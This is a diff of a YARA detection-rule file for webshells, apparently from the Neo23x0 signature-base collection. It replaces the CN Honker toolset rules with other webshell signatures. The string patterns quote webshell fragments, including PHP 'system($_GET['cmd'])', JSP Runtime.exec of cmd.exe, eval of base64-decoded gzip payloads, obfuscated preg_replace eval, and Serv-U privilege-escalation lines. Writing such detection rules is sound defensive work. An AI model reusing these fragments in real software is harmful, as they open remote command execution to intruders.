 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "fc7043aaac0ee2d860d11f18ddfffbede9d07957"
-		logic_hash = "3ad4207e426ed2f9df0e0bac0e906af437b0774ba2ebb541afbe7e29b395ad63"
+		hash = "a3b8b2280c56eaab777d633535baf21d"
+		logic_hash = "c214e50b209970c03d389d97673901ec44b2727e5c7588e5e4d0a644cc691423"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "String url=\"jdbc:oracle:thin:@localhost:1521:orcl\";" fullword ascii
-		$s2 = "String user=\"oracle_admin\";" fullword ascii
-		$s3 = "String sql=\"SELECT 1,2,3,4,5,6,7,8,9,10 from user_info\";" fullword ascii
+		$s0 = "????????????????%><html><head><title>hahahaha</title></head><body bgcolor=\"#fff"
+		$s1 = "<%@page contentType=\"text/html; charset=GBK\" import=\"java.io.*;\"%><%!private"
 
 	condition:
-		filesize < 7KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_ASPX_Aspx4 : FILE
+rule SIGNATURE_BASE_Webshell_Php_Ghost
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file aspx4.txt"
+		description = "Web Shell - file ghost.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4a13c809-48f7-54f7-9ce3-10d6d48104fb"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L511-L527"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1632-L1647"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "200a8f15ffb6e3af31d28c55588003b5025497eb"
-		logic_hash = "0aab8e327b4477cb0b8cd5d4b1e4b52c160180656dad57b0498654da1c8d7a29"
+		hash = "38dc8383da0859dca82cf0c943dbf16d"
+		logic_hash = "9a7635d313345e7b7cb7424726ed62015afd78412b504e406155f85c4cdf623f"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s4 = "File.Delete(cdir.FullName + \"\\\\test\");" fullword ascii
-		$s5 = "start<asp:TextBox ID=\"Fport_TextBox\" runat=\"server\" Text=\"c:\\\" Width=\"60" ascii
-		$s6 = "<div>Code By <a href =\"http://www.hkmjj.com\">Www.hkmjj.Com</a></div>" fullword ascii
+		$s1 = "<?php $OOO000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64'"
+		$s6 = "//<img width=1 height=1 src=\"http://websafe.facaiok.com/just7z/sx.asp?u=***.***"
+		$s7 = "preg_replace('\\'a\\'eis','e'.'v'.'a'.'l'.'(KmU(\"" fullword
 
 	condition:
-		filesize < 11KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_ASPX_Aspx : FILE
+rule SIGNATURE_BASE_Webshell_Winx_Shell
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file aspx.txt"
+		description = "Web Shell - file WinX Shell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4a13c809-48f7-54f7-9ce3-10d6d48104fb"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L529-L546"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1648-L1662"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8378619b2a7d446477946eabaa1e6744dec651c1"
-		logic_hash = "b59684633fd72bd1804a96850a8b358db98c169415b6e65fe3ecfb4d9fde72d0"
+		hash = "17ab5086aef89d4951fe9b7c7a561dda"
+		logic_hash = "e6dd5178cafccca751dd3f2e36206acd214a65b2e0783a738a104b3dc680ca21"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "string iVDT=\"-SETUSERSETUP\\r\\n-IP=0.0.0.0\\r\\n-PortNo=52521\\r\\n-User=bin" ascii
-		$s1 = "SQLExec : <asp:DropDownList runat=\"server\" ID=\"FGEy\" AutoPostBack=\"True\" O" ascii
-		$s2 = "td.Text=\"<a href=\\\"javascript:Bin_PostBack('urJG','\"+dt.Rows[j][\"ProcessID" ascii
-		$s3 = "vyX.Text+=\"<a href=\\\"javascript:Bin_PostBack('Bin_Regread','\"+MVVJ(rootkey)+" ascii
+		$s5 = "print \"<font face=\\\"Verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">Filenam"
+		$s8 = "print \"<font face=\\\"Verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">File: </"
 
 	condition:
-		filesize < 353KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Su7_X_9_X : FILE
+rule SIGNATURE_BASE_Webshell_Crystal_Crystal
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file su7.x-9.x.asp"
+		description = "Web Shell - file Crystal.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5d546ce8-6f8f-5b0b-9472-23f283ef9f80"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L548-L563"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1663-L1677"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "808396b51023cc8356f8049cfe279b349ca08f1a"
-		logic_hash = "2d2398cf0f9e253eea343d39b6555f2633f92f627f1c93cc28123d5a7f3d1bf1"
+		hash = "fdbf54d5bf3264eb1c4bff1fac548879"
+		logic_hash = "735332a2ec7df65cca4ca69e702c5893d302a01c7ee7b84d01a1e6ab9646de93"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "returns=httpopen(\"LoginID=\"&user&\"&FullName=&Password=\"&pass&\"&ComboPasswor" ascii
-		$s1 = "returns=httpopen(\"\",\"POST\",\"http://127.0.0.1:\"&port&\"/Admin/XML/User.xml?" ascii
+		$s1 = "show opened ports</option></select><input type=\"hidden\" name=\"cmd_txt\" value"
+		$s6 = "\" href=\"?act=tools\"><font color=#CC0000 size=\"3\">Tools</font></a></span></f"
 
 	condition:
-		filesize < 59KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Cfmshell : FILE
+rule SIGNATURE_BASE_Webshell_R57_1_4_0
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file cfmShell.cfm"
+		description = "Web Shell - file r57.1.4.0.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "40d50ddb-2963-5d8e-b93a-bb44a8944229"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L565-L580"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1678-L1694"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "740796909b5d011128b6c54954788d14faea9117"
-		logic_hash = "0767012ec8fd4a18a64eca04d459efb55fafd29ed052dab8a0eb1b8f4ce7aa66"
+		hash = "574f3303e131242568b0caf3de42f325"
+		logic_hash = "cb48621c572d529b8dc634e7b6360257ad4fce9664bfca7ee7c0101be42d2c24"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<cfexecute name=\"C:\\Winnt\\System32\\cmd.exe\"" fullword ascii
-		$s4 = "<cfif FileExists(\"#GetTempDirectory()#foobar.txt\") is \"Yes\">" fullword ascii
+		$s4 = "@ini_set('error_log',NULL);" fullword
+		$s6 = "$pass='abcdef1234567890abcdef1234567890';" fullword
+		$s7 = "@ini_restore(\"disable_functions\");" fullword
+		$s9 = "@ini_restore(\"safe_mode_exec_dir\");" fullword
 
 	condition:
-		filesize < 4KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_ASP_Asp4 : FILE
+rule SIGNATURE_BASE_Webshell_Asp_Ajn
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file asp4.txt"
+		description = "Web Shell - file ajn.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4125bb40-3f5c-53f5-b906-54fa77b119f5"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L582-L598"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1696-L1710"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4005b83ced1c032dc657283341617c410bc007b8"
-		logic_hash = "ae02d1efc975a8592a00cbab823355fb778fbb589f5752dd913aa432b316c3a4"
+		hash = "aaafafc5d286f0bff827a931f6378d04"
+		logic_hash = "0a6c9a210c0337d6b984bcf6cd7f14103a0f6f5d38a26c789519c2b1629aaede"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "if ShellPath=\"\" Then ShellPath = \"cmd.exe\"" fullword ascii
-		$s6 = "Response.Cookies(Cookie_Login) = sPwd" fullword ascii
-		$s8 = "Set DD=CM.exec(ShellPath&\" /c \"&DefCmd)" fullword ascii
+		$s1 = "seal.write \"Set WshShell = CreateObject(\"\"WScript.Shell\"\")\" & vbcrlf" fullword
+		$s6 = "seal.write \"BinaryStream.SaveToFile \"\"c:\\downloaded.zip\"\", adSaveCreateOve"
 
 	condition:
-		filesize < 150KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Serv_U_2_Admin_By_Lake2 : FILE
+rule SIGNATURE_BASE_Webshell_Php_Cmd
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file Serv-U 2 admin by lake2.asp"
+		description = "Web Shell - file cmd.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8fce8835-a4ed-58df-a725-0c1fc04becaa"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L600-L617"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1711-L1726"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "cb8039f213e611ab2687edd23e63956c55f30578"
-		logic_hash = "a67c08b3a4bed2385d2fa8c007615bfb37a2d739cc13ee2e0f5eda00536b6ea8"
+		hash = "c38ae5ba61fd84f6bbbab98d89d8a346"
+		logic_hash = "d9a0802f6fd7047ba5477f6bba61c4ac02cabfce06270fdbd8e8e68a693ccf68"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "xPost3.Open \"POST\", \"http://127.0.0.1:\"& port &\"/lake2\", True" fullword ascii
-		$s2 = "response.write \"FTP user lake  pass admin123 :)<br><BR>\"" fullword ascii
-		$s8 = "<p>Serv-U Local Get SYSTEM Shell with ASP" fullword ascii
-		$s9 = "\"-HomeDir=c:\\\\\" & vbcrlf & \"-LoginMesFile=\" & vbcrlf & \"-Disable=0\" & vb" ascii
+		$s0 = "if($_GET['cmd']) {" fullword
+		$s1 = "// cmd.php = Command Execution" fullword
+		$s7 = "  system($_GET['cmd']);" fullword
 
 	condition:
-		filesize < 17KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Php3 : FILE
+rule SIGNATURE_BASE_Webshell_Asp_List
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file php3.txt"
+		description = "Web Shell - file list.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3000ac40-35de-5d24-85fb-4d105b07c2e7"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L619-L634"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1727-L1741"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e2924cb0537f4cdfd6f1bd44caaaf68a73419b9d"
-		logic_hash = "ba3892feacbbe3d7c6b6308a22ca22b19ae84b6490df2c976852260da2a96ca1"
+		hash = "1cfa493a165eb4b43e6d4cc0f2eab575"
+		logic_hash = "9c8bdeb5992015b26fbee418ed6e6b7c6b0901f26bddf9dc26706c0b63ea9c95"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "} elseif(@is_resource($f = @popen($cfe,\"r\"))) {" fullword ascii
-		$s2 = "cf('/tmp/.bc',$back_connect);" fullword ascii
+		$s0 = "<INPUT TYPE=\"hidden\" NAME=\"type\" value=\"<%=tipo%>\">" fullword
+		$s4 = "Response.Write(\"<h3>FILE: \" & file & \"</h3>\")" fullword
 
 	condition:
-		filesize < 8KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Serv_U_By_Goldsun : FILE
+rule SIGNATURE_BASE_Webshell_PHP_Co
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file Serv-U_by_Goldsun.asp"
+		description = "Web Shell - file co.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d8b85c33-b05d-531a-9c0a-a1dddcae0da4"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L636-L653"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1742-L1756"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d4d7a632af65a961a1dbd0cff80d5a5c2b397e8c"
-		logic_hash = "962b2e75c03f716fc039cf26aa238e9a3faf5a7ea8fb3d4da556fa601790055a"
+		hash = "62199f5ac721a0cb9b28f465a513874c"
+		logic_hash = "3fab3e97d10b6c56fb7df8bcd520bda318fc127a620c5aafba09cb36ffd6a8df"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "b.open \"GET\", \"http://127.0.0.1:\" & ftpport & \"/goldsun/upadmin/s2\", True," ascii
-		$s2 = "newuser = \"-SETUSERSETUP\" & vbCrLf & \"-IP=0.0.0.0\" & vbCrLf & \"-PortNo=\" &" ascii
-		$s3 = "127.0.0.1:<%=port%>," fullword ascii
-		$s4 = "GName=\"http://\" & request.servervariables(\"server_name\")&\":\"&request.serve" ascii
+		$s0 = "cGX6R9q733WvRRjISKHOp9neT7wa6ZAD8uthmVJV" fullword
+		$s11 = "6Mk36lz/HOkFfoXX87MpPhZzBQH6OaYukNg1OE1j" fullword
 
 	condition:
-		filesize < 30KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Php10 : FILE
+rule SIGNATURE_BASE_Webshell_PHP_150
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file php10.txt"
+		description = "Web Shell - file 150.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5fe78cc6-8be3-595f-a082-e361259938e5"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L655-L670"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1757-L1771"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3698c566a0ae07234c8957112cdb34b79362b494"
-		logic_hash = "76bb2dfd518173f031cc3c93b2098edaef4aca09f0dd8228223257b0b7df452b"
+		hash = "400c4b0bed5c90f048398e1d268ce4dc"
+		logic_hash = "139e3d6aa3cd2b6a9731a6cc14c921f9fd82ff7ca79d156f1ff6bc544897fb12"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "dumpTable($N,$M,$Hc=false){if($_POST[\"format\"]!=\"sql\"){echo\"\\xef\\xbb\\xbf" ascii
-		$s2 = "';if(DB==\"\"||!$od){echo\"<a href='\".h(ME).\"sql='\".bold(isset($_GET[\"sql\"]" ascii
+		$s0 = "HJ3HjqxclkZfp"
+		$s1 = "<? eval(gzinflate(base64_decode('" fullword
 
 	condition:
-		filesize < 600KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Serv_U_Servu : FILE
+rule SIGNATURE_BASE_Webshell_Jsp_Cmdjsp_2
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file servu.php"
+		description = "Web Shell - file cmdjsp.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3e50d991-7297-5766-b68a-e74aa34ce042"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L671-L686"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1772-L1786"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "7de701b86820096e486e64ca34f1fa9f2fbba641"
-		logic_hash = "d3956b6daa0649233372aea4176e0d43c44d866146884222f92b7efe01f288bb"
+		hash = "1b5ae3649f03784e2a5073fa4d160c8b"
+		logic_hash = "83be82e260adcff9d3d11344c363f6b5da331339ffe78e561cea9ab09b209030"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "fputs ($conn_id, \"SITE EXEC \".$dir.\"cmd.exe /c \".$cmd.\"\\r\\n\");" fullword ascii
-		$s1 = "function ftpcmd($ftpport,$user,$password,$dir,$cmd){" fullword ascii
+		$s0 = "Process p = Runtime.getRuntime().exec(\"cmd.exe /C \" + cmd);" fullword
+		$s4 = "<FORM METHOD=GET ACTION='cmdjsp.jsp'>" fullword
 
 	condition:
-		filesize < 41KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Portrecall_Jsp2 : FILE
+rule SIGNATURE_BASE_Webshell_PHP_C37
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file jsp2.txt"
+		description = "Web Shell - file c37.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cd34cb47-c5e0-5094-a501-6a8a00d94018"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L688-L704"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1787-L1801"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "412ed15eb0d24298ba41731502018800ffc24bfc"
-		logic_hash = "1ec77a1b0d30cdebce1b5b07445247016230b733a594d8d1de642c2c8af63031"
+		hash = "d01144c04e7a46870a8dd823eb2fe5c8"
+		logic_hash = "b93394f4e05cc96c31a8adcb0981aa8b069780893c469b41ece3d3ce92c42251"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "final String remoteIP =request.getParameter(\"remoteIP\");" fullword ascii
-		$s4 = "final String localIP = request.getParameter(\"localIP\");" fullword ascii
-		$s20 = "final String localPort = \"3390\";//request.getParameter(\"localPort\");" fullword ascii
+		$s3 = "array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj'),"
+		$s9 = "++$F; $File = urlencode($dir[$dirFILE]); $eXT = '.:'; if (strpos($dir[$dirFILE],"
 
 	condition:
-		filesize < 23KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_ASPX_Aspx2 : FILE
+rule SIGNATURE_BASE_Webshell_PHP_B37
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file aspx2.txt"
+		description = "Web Shell - file b37.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0da59fde-2214-5677-943f-05b8da4fd9d4"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L706-L723"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1802-L1815"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "95db7a60f4a9245ffd04c4d9724c2745da55e9fd"
-		logic_hash = "7af90992bc3f708d877dcd5841c0d132793e41a0796607907084516d955b3ae0"
+		hash = "0421445303cfd0ec6bc20b3846e30ff0"
+		logic_hash = "ae0cca5723a1e885c26ece5082c24f4c95f0262b8e7baf6db5efde5cfee2cc42"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "if (password.Equals(this.txtPass.Text))" fullword ascii
-		$s1 = "<head runat=\"server\">" fullword ascii
-		$s2 = ":<asp:TextBox runat=\"server\" ID=\"txtPass\" Width=\"400px\"></asp:TextBox>" fullword ascii
-		$s3 = "this.lblthispath.Text = Server.MapPath(Request.ServerVariables[\"PATH_INFO\"]);" fullword ascii
+		$s0 = "xmg2/G4MZ7KpNveRaLgOJvBcqa2A8/sKWp9W93NLXpTTUgRc"
 
 	condition:
-		uint16( 0 ) == 0x253c and filesize < 9KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_ASP_Hy2006A : FILE
+rule SIGNATURE_BASE_Webshell_Php_Backdoor
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file hy2006a.txt"
+		description = "Web Shell - file php-backdoor.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "115651d3-63e1-58e3-b27c-42271111bb91"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L725-L740"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1816-L1830"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "20da92b2075e6d96636f883dcdd3db4a38c01090"
-		logic_hash = "a24bf11a2728bb8d18ea005b057648770956694e0b257d4464ad15ee3e24eda2"
+		hash = "2b5cb105c4ea9b5ebc64705b4bd86bf7"
+		logic_hash = "1f754b4d29eb93316183cf904b375ded7ccdae1d2196fe05950c449ed0d690f4"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s15 = "Const myCmdDotExeFile = \"command.com\"" fullword ascii
-		$s16 = "If LCase(appName) = \"cmd.exe\" And appArgs <> \"\" Then" fullword ascii
+		$s1 = "if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))" fullword
+		$s2 = "<pre><form action=\"<? echo $PHP_SELF; ?>\" METHOD=GET >execute command: <input "
 
 	condition:
-		filesize < 406KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Php1 : FILE
+rule SIGNATURE_BASE_Webshell_Asp_Dabao
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file php1.txt"
+		description = "Web Shell - file dabao.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5fe78cc6-8be3-595f-a082-e361259938e5"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L742-L758"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1831-L1845"
